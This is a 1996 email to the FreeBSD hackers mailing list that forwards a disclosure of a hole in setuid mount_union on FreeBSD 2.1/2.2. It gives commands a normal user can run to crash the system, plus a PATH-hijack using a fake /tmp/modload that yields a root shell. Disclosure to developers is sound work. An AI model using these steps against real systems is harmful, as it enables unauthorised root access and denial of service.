From owner-freebsd-hackers  Fri May 17 16:03:56 1996
Return-Path: owner-hackers
Received: (from root@localhost)
          by freefall.freebsd.org (8.7.3/8.7.3) id QAA27187
          for hackers-outgoing; Fri, 17 May 1996 16:03:56 -0700 (PDT)
Received: from mail.jrihealth.com (mail.jrihealth.com [204.249.32.3])
          by freefall.freebsd.org (8.7.3/8.7.3) with SMTP id QAA27182
          for <freebsd-hackers@freebsd.org>; Fri, 17 May 1996 16:03:53 -0700 (PDT)
Received: from library.pride.net (danp@library.pride.net [204.249.32.4]) by mail.jrihealth.com (8.3/8.6.6.Beta9) with SMTP id TAA15874; Fri, 17 May 1996 19:05:52 -0400
Date: Fri, 17 May 1996 19:06:03 -0400 (EDT)
From: Dan Polivy <danp@library.pride.net>
To: freebsd-hackers@freebsd.org
Subject: SECURITY BUG in FreeBSD (fwd)
Message-ID: <Pine.BSF.3.91.960517190355.230C-100000@library.pride.net>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-hackers@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

I came across this in my travels...thought you guys may be interesting 
(in  case you didn't already know)...It's worked for me on my -RELEASE, 
and -STABLE machines...dunno about any others...

Dan

+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|         JRI HIS MIS Systems Administrator/Tech Support         |
|////////////////////////////////////////////////////////////////|
|    danp@busstop.org dpolivy@jri.org danp@library.pride.net     |
|\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\|
|        Check out JRI's Homepage at http://www.jri.org          |
|////////////////////////////////////////////////////////////////|
| EMail health@jri.org or check out http://www.jri.org/jrihealth |
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=+

---------------------------------
Hi!
FreeBSD has a security hole...
dangerous is mount_union if suid is set
vulnerable systems are: FreeBSD 2.1 RELEASE/2.2 CURRENT
probably FreeBSD 2.1 STABLE is not vulnerable
to crash system (as a normal user) try this:
mkdir a
mkdir b
mount_union ~/a ~/b
mount_union -b ~/a ~/b

to got euid try this:
export PATH=/tmp:$PATH #if zsh, of course
echo /bin/sh >/tmp/modload
chmod +x /tmp/modload
mount_union /dir1 /dir2
and You are root!

Hole found by Adam Kubicki

Best wishes
    Chris Labanowski

    KL
----------------------------------